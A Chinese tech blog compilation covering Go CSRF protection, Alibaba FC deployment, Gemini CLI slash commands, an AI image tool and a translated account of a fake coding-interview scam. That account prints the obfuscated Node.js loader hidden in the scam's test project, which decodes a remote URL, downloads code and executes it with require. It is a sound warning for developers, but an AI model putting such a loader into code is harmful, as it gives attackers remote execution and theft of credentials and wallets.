从多个渠道了解了独立开发的收款方式，最终选择了微信支付。微信支付在国内用户中足够流行，目前也是最容易接入的几种可靠支付方式之一，并且使用起来也比较方便。

现在可以在“AI图生图”的官方网站上直接购买服务啦。

效果如下：

其他方式

国外的Stripe，lemonsqueezy很流行，但搜了很多资料，目前看都是需要以公司为主体才能申请，个人很难通过。

参考

译|在 Go 中防止 CSRF 的现代方法,CrossOriginProtection

2025-10-16T16:00:00.000Z

Go 1.25 在标准库中引入了一个新的中间件 http.CrossOriginProtection。这让我思考：我们是否终于可以在不依赖基于令牌的检查（如双重提交 Cookie）的情况下防止 CSRF 攻击？是否可以在不引入第三方包（如 justinas/nosurf 或 gorilla/csrf）的情况下构建安全的 Web 应用？

答案是一个谨慎的 “是” —— 只要满足一些重要条件。

`http.CrossOriginProtection` 中间件

该中间件通过检查请求中的 Sec-Fetch-Site 和 Origin 头来判断请求来源。它会自动拒绝来自非同源的 非安全请求（如 POST、PUT），并返回 403 Forbidden。

工作原理

现代浏览器 会自动在请求中包含 Sec-Fetch-Site 头。
如果请求来源与目标页面同源，则头部为 same-origin。
如果不同源，则 http.CrossOriginProtection 会拒绝请求。
如果没有 Sec-Fetch-Site，则回退检查 Origin 与 Host 是否匹配。
如果两者都不存在，则认为请求不是来自浏览器，允许通过。
仅对 非安全方法（POST、PUT 等）进行检查，GET/OPTIONS 等安全方法始终允许。

使用示例

package main

import (
    "fmt"
    "log/slog"
    "net/http"
    "os"
)

func main() {
    mux := http.NewServeMux()
    mux.HandleFunc("/", home)

    slog.Info("starting server on :4000")
    err := http.ListenAndServe(":4000", http.NewCrossOriginProtection(mux))
    if err != nil {
        slog.Error(err.Error())
        os.Exit(1)
    }
}

func home(w http.ResponseWriter, r *http.Request) {
    fmt.Fprint(w, "Hello!")
}

如果您愿意，也可以配置 http.CrossOriginProtection 的行为。配置选项包括能够添加受信任的来源（允许来自这些来源的跨域请求），以及能够为被拒绝的请求使用自定义处理程序，而不是默认的 403 Forbidden 响应。

想自定义行为时，可以使用如下模式：

文件: main.go

package main

import (
"fmt"
"log/slog"
"net/http"
"os"
)

func main() {
mux := http.NewServeMux()
mux.HandleFunc("/", home)

slog.Info("starting server on :4000")

err := http.ListenAndServe(":4000", preventCSRF(mux))
if err != nil {
slog.Error(err.Error())
os.Exit(1)
}
}

func preventCSRF(next http.Handler) http.Handler {
cop := http.NewCrossOriginProtection()

cop.AddTrustedOrigin("https://foo.example.com")

cop.SetDenyHandler(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusBadRequest)
w.Write([]byte("CSRF check failed"))
}))

return cop.Handler(next)
}

func home(w http.ResponseWriter, r *http.Request) {
fmt.Fprint(w, "Hello!")
}

限制

http.CrossOriginProtection 的主要限制是它只对阻止来自现代浏览器的请求有效。您的应用程序仍然容易受到来自不包含 Sec-Fetch-Site 或 Origin 头（通常是 2020 年之前的）的旧版浏览器的 CSRF 攻击。

目前，浏览器对 Sec-Fetch-Site 头的支持率为 92%，对 Origin 头为 95%。因此，通常情况下，仅仅依靠 http.CrossOriginProtection 不足以作为您唯一的 CSRF 防护措施。

还需要注意的是，只有当您的应用程序具有“可信来源”时才会发送 Sec-Fetch-Site 头——这基本上意味着您的应用程序在生产环境中使用 HTTPS（或开发期间使用 localhost），http.CrossOriginProtection 才能充分发挥作用。

您还应该知道，当请求中不存在 Sec-Fetch-Site 头，并且回退到比较 Origin 和 Host 头时，Host 头不包含方案。这个限制意味着当不存在 Sec-Fetch-Site 头但存在 Origin 头时，http.CrossOriginProtection 会错误地允许从 http://{host} 到 https://{host} 的跨域请求。为了减轻这种风险，您理想情况下应该配置您的应用程序使用 HTTP 严格传输安全 (HSTS)。

强制使用 TLS 1.3

深入研究这个问题让我开始思考… 如果您已经计划使用 HTTPS 并强制使用 TLS 1.3 作为最低支持的 TLS 版本呢？您能否确信所有支持 TLS 1.3 的网络浏览器也支持 Sec-Fetch-Site 或 Origin 头之一呢？

据我从 MDN 兼容性数据和 Can I Use 网站的表格来看，答案是“是”，适用于（几乎）所有主流浏览器。

如果您强制使用 TLS 1.3 作为最低版本：

不支持 TLS 1.3 的旧版浏览器根本无法连接到您的应用程序。
对于支持 TLS 1.3 并可以连接的现代主流浏览器，您可以确信至少支持 Sec-Fetch-Site 或 Origin 头之一——因此 http.CrossOriginProtection 将有效工作。

我能看到的唯一例外是 Firefox v60-69 (2018-2019)，它不支持 Sec-Fetch-Site 头，并且不为 POST 请求发送 Origin 头。这意味着 http.CrossOriginProtection 将无法有效阻止来自该浏览器的请求。Can I Use 显示 Firefox v60-69 的使用率为 0%，因此这里的风险似乎非常低——但世界上某个地方可能仍然有一些计算机在运行它。

此外，我们只掌握了主流浏览器（Chrome/Chromium、Firefox、Edge、Safari、Opera 和 Internet Explorer）的信息。但当然，还存在其他浏览器。它们大多数是 Chromium 或 Firefox 的分支，因此很可能没问题，但这里没有保证，并且很难量化风险。

因此，如果您使用 HTTPS 并强制使用 TLS 1.3，这是确保 http.CrossOriginProtection 有效工作的一大步。然而，Firefox v60-69 和非主流浏览器仍然存在非零风险，因此您可能希望增加一些纵深防御并同时使用 SameSite Cookie。

我们稍后会更多地讨论 SameSite Cookie，但首先我们需要快速绕道讨论“源 (origin)”和“站点 (site)”这两个术语之间的区别。

跨站点与跨源

在 Web 规范和 Web 浏览器的世界中，跨站点 (cross-site) 和跨源 (cross-origin) 是细微不同的概念，在这样的安全上下文中，理解它们之间的区别并确切地表达我们的意思非常重要。

我将快速解释。

如果两个网站共享完全相同的方案 (scheme)、主机名 (hostname) 和端口（如果存在），则它们具有相同的源 (origin)。因此 https://example.com 和 https://www.example.com 不是相同的源，因为主机名 (example.com 和 www.example.com) 不同。它们之间的请求将是跨源的。

如果两个网站共享相同的方案和可注册域 (registerable domain)，则它们是“同站 (same site)”的。

注意：可注册域是主机名中紧邻（并包括）有效顶级域 (effective TLD) 的部分。以下是一些示例：

对于 https://www.google.com/，顶级域是 com，可注册域是 google.com。
对于 https://login.mail.ucla.edu，顶级域是 edu，可注册域是 ucla.edu。
对于 https://www.gov.uk，顶级域是 gov.uk，可注册域是 www.gov.uk。

您可以在此处找到有效顶级域的完整列表。

因此，https://example.com、https://www.example.com 和 https://login.admin.example.com 都被认为是同站的，因为方案 (https) 和可注册域 (example.com) 相同。它们之间的请求不会被认为是跨站的，但会是跨源的。

注意：某些浏览器版本使用不同的同站定义，它不要求相同的方案，只要求相同的可注册域。对于这些浏览器版本，https://admin.example.com 和 http://blog.example.com 也将被视为同站。

如今，这通常被称为无方案同站 (schemaless same-site)，但在历史版本或文档中，它可能只被称为同站。

那么，我在这里想要表达的要点是什么呢？

Go 的 http.CrossOriginProtection 中间件的命名是准确且恰当的。它阻止跨源请求。它比只阻止跨站请求更严格，因为它也阻止来自同一站点（即可注册域下的其他源）的请求。

这很有用，因为它有助于防止您的老旧、十多年未更新的 WordPress 博客 https://blog.example.com 被攻破，并被用来向您的重要网站 https://admin.example.com 发起请求伪造攻击的情况。

当大多数人——包括我自己在内——随意谈论“CSRF 攻击”时，我们大多数时候指的是实际上是跨源请求伪造 (cross-origin request forgery)，而不仅仅是跨站请求伪造 (cross-site request forgery)。很遗憾 CSRF 是描述这类攻击的常用和已知缩写，因为大多数时候 CORF 会更准确和恰当。但嘿！这就是我们所处的混乱世界。

然而，在本文的其余部分，当我的意思确实是跨源请求伪造时，我将使用 CORF 代替 CSRF。

SameSite Cookie 属性自 2017 年起普遍受到网络浏览器的支持，Go 自 v1.11 起也支持。如果您在 Cookie 上设置 SameSite=Lax 或 SameSite=Strict 属性，则该 Cookie 将仅包含在发送到设置它的同一站点的请求中。反过来，这可以防止跨站请求伪造攻击（但不能防止来自同一站点内的跨源攻击）。

这里有一些好消息——所有支持 TLS 1.3 的主流浏览器也都完全支持 SameSite Cookie，据我所知没有例外。因此，如果您强制使用 TLS 1.3，您可以确信所有使用您应用程序的主流浏览器都会遵守 SameSite 属性。

这意味着通过在 Cookie 上使用 SameSite=Lax 或 SameSite=Strict，您可以消除我们之前谈到的 Firefox v60-69 引起的跨站请求伪造风险。

综合考量

如果您结合使用 HTTPS，强制将 TLS 1.3 作为最低版本，适当使用 SameSite=Lax 或 SameSite=Strict Cookie，并在您的应用程序中使用 http.CrossOriginProtection 中间件，据我所知，主流浏览器只剩下两个未被缓解的 CSRF/CORF 风险：

Firefox v60-69 中来自同一站点的 CORF 攻击（即来自您的可注册域下的另一个子域）。
从您的源的 HTTP 版本发起的 CORF 攻击，来自不支持 Sec-Fetch-Site 头的浏览器。

对于第一个风险，如果您在可注册域下没有任何其他网站，或者您确信这些网站是安全的且未被攻破，那么鉴于 Firefox v60-69 的使用率极低，这可能是一个您愿意接受的风险。

对于第二个风险，如果您的源根本不支持 HTTP（包括重定向），那么您无需担心这一点。否则，您可以通过在 HTTPS 响应中包含 HSTS 头来缓解风险。

在本文的开头，我提到在某些条件下不使用基于令牌的 CSRF 检查可能是可以的。那么，让我们回顾一下这些条件是什么：

您的应用程序使用 HTTPS 并强制将 TLS 1.3 作为最低版本。您接受使用旧版浏览器的用户将根本无法连接到您的应用程序。
您遵循良好实践，绝不响应使用安全方法 GET、HEAD、OPTIONS 或 TRACE 的请求来更改重要的应用程序状态。
您同时使用 http.CrossOriginProtection 中间件和 SameSite=Lax 或 SameSite=Strict Cookie。使用 SameSite Cookie 对于一般的纵深防御很重要，更具体地说，是为了缓解来自 Firefox v60-69 的 CSRF 攻击。
由于来自 Firefox v60-69 的未受保护的同站 CORF 攻击风险，您要么在您的可注册域下没有任何其他网站，要么您确信它们是安全且未被攻破的。
您的应用程序源根本没有 HTTP 版本，或者您在 HTTPS 响应中包含 HSTS 头。
最后，您愿意接受来自非主流浏览器（支持 TLS 1.3 但不支持 Origin 或 Sec-Fetch-Site 头或 SameSite Cookie）的 CSRF/CORF 攻击的难以量化的风险。是否存在这样的浏览器？我不知道，我也不确定是否有办法 100% 确定地回答这个问题。因此，您需要在此处进行自己的风险评估，这可能是一个您只愿意接受的风险，如果您的应用程序是一个低价值目标，并且成功进行 CSRF/CORF 攻击的影响既孤立又轻微。

原文

https://www.alexedwards.net/blog/preventing-csrf-in-go

译|面试官引诱我安装恶意软件(我是如何在一次“工作面试”中差点被黑的)

2025-10-16T16:00:00.000Z

我差30秒就在我的机器上运行了恶意软件。

攻击媒介？来自一家“合法”区块链公司的虚假编程面试。

以下是一个复杂的诈骗操作如何几乎骗到我，以及为什么每个开发人员都应该阅读这篇文章。

骗局的设置

上周，我收到了 Mykola Yanchii 的一条 LinkedIn 消息。他是 Symfa 的首席区块链官。真实的公司。真实的 LinkedIn 个人资料。1000 多个联系人。一切看起来都很完美。

消息写得很流畅、专业。“我们正在开发 BestCity，一个旨在改变房地产工作流程的平台。有兼职职位。灵活的结构。”

我做了 8 年的自由职业者。构建过 Web 应用程序，参与过各种项目，也做过代码审查。我通常对安全问题很偏执——或者说我自以为是。

这看起来很合法。所以我同意了通话。

诱饵

在我们见面之前，Mykola 给我发了一个“测试项目”——这是技术面试的标准做法。一个用于评估我技能的 React/Node 代码库。30 分钟的测试。很简单。

Bitbucket 仓库看起来很专业。干净的 README。合适的文档。甚至还有那张公司里常见的、一个女人拿着平板电脑站在房子前的照片。你懂的。

这就是我差点搞砸的地方：我开会要迟到了。只有大约 30 分钟的时间来审查代码。所以我做了懒惰的开发人员会做的事情——我开始在没有先运行代码的情况下到处翻看代码库。

通常，我会沙箱化所有东西。Docker 容器。隔离的环境。但我当时很匆忙。

我花了 30 分钟修复了明显的错误，添加了一个 docker-compose 文件，清理了代码。都是些标准操作。准备好运行它并展示我的工作。

然后我有了那种偏执的开发人员时刻。

幸免于难

在敲下 npm start 之前，我向我的 Cursor AI 代理提出了这个提示：

“在我运行这个应用程序之前，你能看看这个代码库中是否有任何可疑的代码吗？比如读取它不应该读取的文件，访问加密钱包等。”

然后，我惊呆了。

在 server/controllers/userController.js 的正中间，坐落着这个“杰作”：

//Get Cookie
(async () => {
    const byteArray = [
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
        110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
        98, 50, 48, 51, 49, 102, 98, 57
    ];
    const uint8Array = new Uint8Array(byteArray);
    const decoder = new TextDecoder('utf-8');
    axios.get(decoder.decode(uint8Array))
        .then(response => {
            new Function("require", response.data.model)(require);
        })
        .catch(error => { });
})();

混淆的。鬼鬼祟祟的。邪恶的。而且 100% 活跃——嵌入在合法的管理功能之间，一旦访问管理路由，就会以完整的服务器权限执行。

我解码了那个字节数组：https://api.npoint.io/2c458612399c3b2031fb9

当我第一次访问该 URL 时，它是活动的。我获取了有效载荷。纯粹的恶意软件。那种会窃取一切的东西——加密钱包、文件、密码，你的整个数字存在。

更绝的是：该 URL 在 24 小时后就失效了。这些家伙不是在开玩笑——他们已经设置了他们的基础设施来快速销毁证据。

我通过 VirusTotal 运行了有效载荷——自己看看行为分析。剧透警告：它很恶心。

骗局的操作

这不是一些业余的骗局。这是复杂的：

LinkedIn 个人资料： Mykola Yanchii 看起来 100% 真实。首席区块链官。合适的工作经历。甚至还有那些关于“创新”和“区块链咨询”的令人尴尬的 LinkedIn 帖子。
公司： Symfa 有一个完整的 LinkedIn 公司页面。专业的品牌。多名员工。关于“用区块链改造房地产”的帖子。他们甚至还有附属页面和关注者网络。
方法： 最初的接触中没有危险信号。专业的语言。合理的项目范围。他们甚至使用 Calendly 进行日程安排。
有效载荷： 恶意代码被战略性地放置在服务器端控制器中，准备在访问管理功能时以完整的 Node.js 权限执行。

心理学

这就是为什么这如此危险：

紧迫性： “在会议前完成测试以节省时间。”
权威性： LinkedIn 验证的个人资料，真实的公司，专业的设置。
熟悉度： 标准的带回家的编程测试。每个开发人员都做过几十个这样的测试。
社会认同： 拥有真实员工和真实联系的真实公司页面。

我差点就上当了。而我对这些东西很偏执。

教训

一个简单的人工智能提示让我免于灾难。

不是花哨的安全工具。不是昂贵的杀毒软件。只是在执行未知代码之前，让我的编码助手查找可疑模式。

可怕的是什么？这种攻击媒介对开发人员来说是完美的。我们整天下载和运行代码。GitHub 仓库、npm 包、编程挑战。我们大多数人并不会对每件事都进行沙箱化。

这是服务器端恶意软件。完整的 Node.js 权限。可以访问环境变量、数据库连接、文件系统、加密钱包。一切。

规模

如果这种复杂的行动正在大规模地针对开发人员，那么已经有多少人受到了攻击？他们现在在多少个生产系统中？

完美的定位： 开发人员是理想的受害者。我们的机器包含了王国的钥匙：生产凭证、加密钱包、客户数据。
专业的伪装： LinkedIn 的合法性、真实的代码库、标准的面试流程。
技术复杂性： 多层混淆、远程有效载荷传递、死人开关、服务器端执行。

一次成功的感染可能会危及大公司的生产系统、价值数百万的加密货币持有量、成千上万用户的个人数据。

底线

如果你是一名正在获得 LinkedIn 工作机会的开发人员：

始终沙箱化未知代码。Docker 容器、虚拟机，随便什么。永远不要在你的主机器上运行它。
使用人工智能扫描可疑模式。只需要 30 秒。可以拯救你的整个数字生活。
验证一切。真实的 LinkedIn 个人资料并不意味着真实的人。真实的公司并不意味着真正的机会。
相信你的直觉。如果有人催促你执行代码，那就是一个危险信号。

这个骗局如此复杂，以至于它骗过了我最初的 BS 检测器。但一个偏执的时刻和一个简单的人工智能提示就揭露了整个事情。

下次有人给你发“编程挑战”时，请记住这个故事。

你的加密钱包会感谢你的。

如果你是一名运行过 LinkedIn 招聘人员发来的“编程挑战”的开发人员，你可能应该把这篇文章读两遍。

LinkedIn 个人资料

消息

bit bucket

https://bitbucket.org/0x3bestcity/test_version/src/main/ - 不确定这个链接会保留多久。

原文

https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview

AI图生图：释放你的无限创造力，免费在线生成惊艳图像

2025-09-26T05:30:00.000Z

在数字创意的浪潮中，人工智能（AI）正以前所未有的方式赋予我们表达自我的力量。曾经需要专业技能和昂贵软件才能实现的视觉艺术，如今AI 的进步，变得触手可及。今天，我们向您隆重介绍一款强大而易用的在线工具——AI图生图，它将彻底改变您的创作流程，让每个人都能轻松成为艺术家。

最重要的是，这款工具限时免费试用，并且无需注册登录，您可以立即开始您的创意之旅！

立即访问 AI图生图，开启无限创造力

核心功能亮点

“AI图生图”不仅仅是一个简单的图像生成器，它集成了多种强大功能，旨在满足从初学者到专业人士的各种需求。

1. 强大的“文生图”与“图生图”模式

无论您是想将脑海中的奇幻场景变为现实，还是希望在现有图片的基础上进行二次创作，我们都能满足您。

文生图 (Text-to-Image): 只需输入一段描述性的文字（我们称之为“提示词”），AI 就能为您绘制出对应的图像。您的想象力是唯一的边界！
图生图 (Image-to-Image): 您可以上传一张自己的图片作为参考，AI
将智能地理解其内容、风格和构图，并根据您的新提示词进行创新性地重绘或风格迁移。

AI图生图：将简单的文字提示变为复杂的视觉作品

2. 丰富的内置预设风格

灵感枯竭？没关系！网站内置了上百种精心调校的预设风格，涵盖3D、动漫、现实主义、纸艺、水墨画等多种艺术形式。只需一键点击，即可将您的想法应用到不同风格上，轻松探索多种可能性。

3. 极致简单的三步操作流程

我们坚信，强大的功能不应以牺牲易用性为代价。整个创作过程被简化为三个直观的步骤：

描述您的想法： 在输入框中填写您的提示词，或上传参考图，并选择您喜欢的风格。
AI 魔法生成： 点击“生成”按钮，我们强大的 AI 模型将立即开始工作。
下载与分享：
短短几十秒后，一幅高质量的图像便会呈现眼前。您可以立即下载高清版本，或在历史记录中随时回顾。

无限的应用场景

“AI图生图”的潜力覆盖了各行各业，无论您的身份是什么，都能从中受益。

设计师与艺术家： 快速生成概念原型，探索不同视觉风格，为您的项目注入源源不断的灵感。
营销与运营人员： 无需再为寻找配图而烦恼。轻松生成独特、免版权风险的社交媒体帖子、博客文章配图和广告素材。
内容创作者： 为您的视频、播客或小说创作引人入胜的封面和插图。
普通爱好者： 制作个性化的手机壁纸、社交媒体头像，或者仅仅是享受将奇思妙想变为现实的乐趣。

无论是商业广告还是个人创作，AI都能胜任

立即开始您的创作之旅！

创意不应被技术门槛所束缚。“AI图生图”致力于将最前沿的AI技术以最简单的方式带给每一位热爱生活、充满想象力的人。

忘记复杂的参数和昂贵的订阅费吧。现在就打开浏览器，访问我们的网站，释放您被压抑已久的创造力！

官方网站： https://seedreamt.programnotes.cn/

我们期待看到您独一无二的精彩作品！

创意作品

迷你 3D 建筑

您的浏览器不支持 iframe, 请点击下方按钮访问。

在新窗口中打开案例

Q版求婚场景

您的浏览器不支持 iframe, 请点击下方按钮访问。

在新窗口中打开案例

三只动物与地标自拍

您的浏览器不支持 iframe, 请点击下方按钮访问。

在新窗口中打开案例

剪影艺术

您的浏览器不支持 iframe, 请点击下方按钮访问。

在新窗口中打开案例

立即访问 AI图生图，探索更多创意

参考

阮一峰.科技周刊,Nano Banana 的几个妙用,用图展示了几个google AI生图大模型的创意案例
nano-banana
github 开源项目,搜集了Nano-Banana的创意用法,Awesome-Nano-Banana-images

AI & Tech 最新发展

2025-09-15T16:00:00.000Z

以下是2025年9月15日至16日过去24小时内最重要的AI和技术发展总结，优先关注模型发布、新论文和开源项目。信息基于网络搜索和X平台数据，包含来源链接。内容聚焦于关键公告、工具更新和创新。

模型发布与更新

OpenAI 升级 Codex，使用新版 GPT-5：OpenAI于9月15日发布Codex的升级版本，集成新GPT-5模型，支持更复杂的编码任务，并引入gpt-realtime功能，提升实时交互能力。来源：TechCrunch 和 OpenAI News.
Alibaba 发布 Qwen 3-Next-80B：这是一个高效混合模型，仅激活约30亿参数，支持10倍速度提升和更低成本，适用于任务优化。来源：PaleBlueDot AI on X.
ByteDance 发布 Seedream 4.0：融合图像生成与编辑，支持2K分辨率输出，生成时间不到2秒。来源：PaleBlueDot AI on X.
Kimi Moonshot AI 发布 K2-0905：1万亿参数MoE模型，支持256k上下文长度，针对代理开发任务，如全代码库处理。来源：PaleBlueDot AI on X.
Meta 发布 MobileLLM-R1：小型LLM模型，针对非商业研究，提升移动设备上的语言处理效率。来源：merve on X.
Tencent 发布 SRPO：高分辨率图像生成模型，以及Points-Reader OCR模型，提升文本识别准确性。来源：merve on X.
ByteDance 发布 HuMo：视频生成模型，支持任意输入生成视频。来源：merve on X.
xAI 发布新AI模型：专注于增强对物理世界的理解和操作，推动机器人和自治系统进步。来源：Daily 5 Minutes News on X.
AnthropicAI 更新 Claude 3.7：聚焦自然语言处理改进和实时应用延迟降低。来源：Daily 5 Minutes News on X.

新论文

arXiv 上新AI论文（9月16日）：包括266篇新论文，亮点如“Is the ‘Agent’ Paradigm a Limiting Framework for Next-Generation Intelligent Systems?”（质疑代理范式对下一代智能系统的限制），以及其他涉及诊断精神患者、生成AI故事等主题。来源：arXiv Artificial Intelligence Recent.
机器学习论文更新：焦点包括使用大语言模型诊断精神患者，以及其他如模拟酵母着丝粒、诊断一维CNN等。来源：arXiv Machine Learning Current.
新兴技术论文：45篇新作，如新西兰房屋能源效率AI工具原型。来源：arXiv Emerging Technologies Current.
Harvard AI论文：PDGrapher：AI工具发现逆转细胞疾病的药物组合。来源：jeromekjerome on X.

开源项目与工具

MistralAI 发布新开源模型：旨在民主化高性能语言处理工具访问。来源：Daily 5 Minutes News on X.
HuggingFace 更新模型仓库：新增50+ NLP和计算机视觉AI模型。来源：Daily 5 Minutes News on X.
StabilityAI 扩展文本到图像功能：提供更高分辨率和更快处理。来源：Daily 5 Minutes News on X.
Replit Agent 3：自主代理工具，用于构建生产级应用，支持10倍自治能力。来源：AI News on X.
NVIDIA 发布 Physics Nemo：物理模拟开源模型。来源：AI News on X.
Switzerland 发布 Apertus：国家级开源AI模型。来源：The AI Track.

其他重要公告与更新

OpenAI 与 Microsoft 重组：签署非约束性谅解备忘录，推动OpenAI向营利性转型，非营利部门保留1000亿美元以上股权。来源：PaleBlueDot AI on X.
OpenAI 获得66亿美元融资：加速AI研发。来源：Daily 5 Minutes News on X.
NVIDIA Rubin CPX 发布：新加速器用于推理预填充阶段，减少对HBM依赖。来源：PaleBlueDot AI on X.
DeepMind 发布新AI伦理框架：指导全球AI系统的负责开发和部署。来源：Daily 5 Minutes News on X.

Serverless|在阿里云FC上部署Go,构建环境中GO版本的切换

2025-09-10T16:00:00.000Z

FC的运行环境custom.debian10和fc构建流水线中默认的go版本为1.18,已经大幅落后,这里介绍下如何修改构建环境中的go版本

脚本

# 删除之前的go
rm -rf /usr/local/go
# 安装指定版本 1.23.12
wget https://golang.google.cn/dl/go1.23.12.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.23.12.linux-amd64.tar.gz
# 设置环境变量
export PATH=/usr/local/go/bin:$PATH

只需在 pre-deploy 步骤中执行这段脚本即可

配置文件

# ------------------------------------
#   If you need English case, you can refer to [s_en.yaml] file
# ------------------------------------
#   欢迎您使用阿里云函数计算 FC 组件进行项目开发
#   组件仓库地址：https://github.com/devsapp/fc
#   组件帮助文档：https://www.serverless-devs.com/fc/readme
#   Yaml参考文档：https://www.serverless-devs.com/fc/yaml/readme
#   关于：
#      - Serverless Devs和FC组件的关系、如何声明/部署多个函数、超过50M的代码包如何部署
#      - 关于.fcignore使用方法、工具中.s目录是做什么、函数进行build操作之后如何处理build的产物
#   等问题，可以参考文档：https://www.serverless-devs.com/fc/tips
#   关于如何做CICD等问题，可以参考：https://www.serverless-devs.com/serverless-devs/cicd
#   关于如何进行环境划分等问题，可以参考：https://www.serverless-devs.com/serverless-devs/extend
#   更多函数计算案例，可参考：https://github.com/devsapp/awesome/
#   有问题快来钉钉群问一下吧：33947367
# ------------------------------------
edition: 1.0.0
name: web-framework-app
# access 是当前应用所需要的密钥信息配置：
# 密钥配置可以参考：https://www.serverless-devs.com/serverless-devs/command/config
# 密钥使用顺序可以参考：https://www.serverless-devs.com/serverless-devs/tool#密钥使用顺序与规范
access: 'undefined'

vars: # 全局变量
  region: 'cn-hangzhou'
  service:
    name: 'demo-api'
    description: 'Serverless Devs Web Framework Service'

services:
  framework: # 业务名称/模块名称
    # 如果只想针对 framework 下面的业务进行相关操作，可以在命令行中加上 framework，例如：
    # 只对framework进行构建：s framework build
    # 如果不带有 framework ，而是直接执行 s build，工具则会对当前Yaml下，所有和 framework 平级的业务模块（如有其他平级的模块，例如下面注释的next-function），按照一定顺序进行 build 操作
    component: fc # 组件名称，Serverless Devs 工具本身类似于一种游戏机，不具备具体的业务能力，组件类似于游戏卡，用户通过向游戏机中插入不同的游戏卡实现不同的功能，即通过使用不同的组件实现不同的具体业务能力
    actions: # 自定义执行逻辑，关于actions 的使用，可以参考：https://www.serverless-devs.com/serverless-devs/yaml#行为描述
      pre-deploy: # 在deploy之前运行
        - run: |
            rm -rf /usr/local/go
            wget https://golang.google.cn/dl/go1.23.12.linux-amd64.tar.gz
            sudo tar -C /usr/local -xzf go1.23.12.linux-amd64.tar.gz
            export PATH=/usr/local/go/bin:$PATH
            go version
            go mod tidy
            GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o main main.go
          path: ./code
    props: # 组件的属性值
      region: ${vars.region} # 关于变量的使用方法，可以参考：https://www.serverless-devs.com/serverless-devs/yaml#变量赋值
      service: ${vars.service}
      function:
        name: 'demo-function'
        description: 'Serverless Devs Web Framework Function'
        codeUri: ./code
        runtime: custom.debian10
        memorySize: 1024
        timeout: 30
        instanceConcurrency: 100
        caPort: 8080
        customRuntimeConfig:
          command:
            - '/code/main'
      triggers:
        - name: httpTrigger
          type: http
          config:
            authType: anonymous
            methods:
              - GET
              - POST
              - PUT
              - DELETE
              - HEAD
              - OPTIONS
      customDomains:
        - domainName: auto
          protocol: HTTP
          routeConfigs:
            - path: /*

参考

阿里云,FC,https://help.aliyun.com/zh/functioncompute/fc-2-0/user-guide/overview-10
go install doc,https://golang.google.cn/doc/install
go,release list, https://golang.google.cn/dl/

AI|Gemini CLI,自定义斜杠命令(译)

2025-09-09T16:00:00.000Z

源自 | 2025年7月31日 Jack Wotherspoon, 开发者倡导者 Abhi Patel, 软件工程师

今天，我们宣布在 Gemini CLI 中支持自定义斜杠命令！这个备受期待的功能可让您定义可重用的提示，以简化与 Gemini CLI 的交互，并有助于提高跨工作流程的效率。斜杠命令可以在本地 .toml 文件中定义，也可以通过模型上下文协议 (MCP) 提示来定义。准备好利用斜杠命令的全新功能来改变您利用 Gemini CLI 的方式！

要使用斜杠命令，请确保您更新到最新版本的 Gemini CLI。

更新 npx：

1	npx @google/gemini-cli

更新 npm：

1	npm install -g @google/gemini-cli@latest

强大的、可扩展的 .toml 文件基础

自定义斜杠命令的基础植根于 .toml 文件。

.toml 文件提供了一个强大且结构化的基础，可在此基础上为复杂命令构建广泛的支持。为了帮助支持广泛的用户，我们将所需的密钥减至最少（只需 prompt）。我们还支持易于使用的参数 {{args}} 和 shell 命令执行 !{...}，可直接在提示中使用。

以下是一个示例 .toml 文件，可使用 Gemini CLI 中的 /review 调用以审查 GitHub PR。请注意，文件名定义了命令名称，并且区分大小写。有关自定义斜杠命令的更多信息，请参阅 Gemini CLI 文档的自定义命令部分。

description="Reviews a pull request based on issue number."
prompt = """
Please provide a detailed pull request review on GitHub issue {{args}}.
Follow these steps:
1. Use `gh pr view {{args}}` to pull the information of the PR.
2. Use `gh pr diff {{args}}` to view the diff of the PR.
3. Understand the intent of the PR using the PR description.
4. If PR description is not detailed enough to understand the intent,
   make sure to note it in your review.
5. Make sure the PR title follows Conventional Commits, here are some recent
   commits to the repo as examples: !{git log --pretty=format:%s -n 10}
6. Search the codebase if required.
7. Write a concise review of the PR, keeping in mind to encourage high
   quality and best practices.
8. Use `gh pr comment {{args}} --body {{review}}` to post the review.
Remember to use the GitHub CLI (`gh`) with the Shell tool for all
GitHub-related tasks.
"""

命名空间

命令的名称由其相对于 commands 目录的文件路径确定。子目录用于创建命名空间命令，路径分隔符（/ 或 \）将转换为冒号 (:)。

/.gemini/commands/test.toml 处的文件将成为 /test 命令。
/.gemini/commands/git/commit.toml 处的文件将成为命名空间命令 /git:commit。

这允许将相关命令分组到单个命名空间下。

构建斜杠命令

接下来的几个部分将向您展示如何为 Gemini CLI 构建斜杠命令。

1 - 创建命令文件

首先，在 ~/.gemini/commands/ 目录中创建一个名为 plan.toml 的文件。这样做会让您创建一个 /plan 命令，告诉 Gemini CLI 仅通过提供分步计划来规划更改，而不开始实施。这种方法可让您在实施前提供反馈并迭代计划。

自定义斜杠命令可以通过在指定目录中定义 .toml 文件来限定于单个用户或项目。

用户范围的命令可用于用户的所有 Gemini CLI 项目，并存储在 ~/.gemini/commands/ 中（注意 ~）。
项目范围的命令仅可从给定项目中的会话中获得，并存储在 .gemini/commands/ 中。

提示：要简化项目工作流程，请将这些文件签入 Git 存储库！

1 2	mkdir -p ~/.gemini/commands touch ~/.gemini/commands/plan.toml

2 - 添加命令定义

打开 plan.toml 并添加以下内容：

# ~/.gemini/commands/plan.toml
description="Investigates and creates a strategic plan to accomplish a goal."
prompt = """
Your primary role is that of a strategist, not an implementer.
Your task is to stop, think deeply, and devise a comprehensive strategic plan.
You MUST NOT write, modify, or execute any code. Your sole focus is on the plan.
Use your available "read" and "search" tools to research and gather information.
Present your strategic plan in markdown. It should be the direct and only output.
1.  **Understanding the Goal:** Re-state the objective to confirm your understanding.
2.  **Investigation & Analysis:** Describe the investigative steps you will take.
3.  **Proposed Strategic Approach:** Outline the high-level strategy.
4.  **Verification Strategy:** Explain how the success of the plan will be verified.
5.  **Anticipated Challenges & Considerations:** Based on your analysis, list potential issues.
Your final output should be ONLY this strategic plan.
"""

3 - 使用命令

现在您可以在 Gemini CLI 中使用此命令：

1	/plan How can I make the project more performant?

Gemini 将规划出更改并输出详细的分步执行计划！

与 MCP 提示的丰富集成

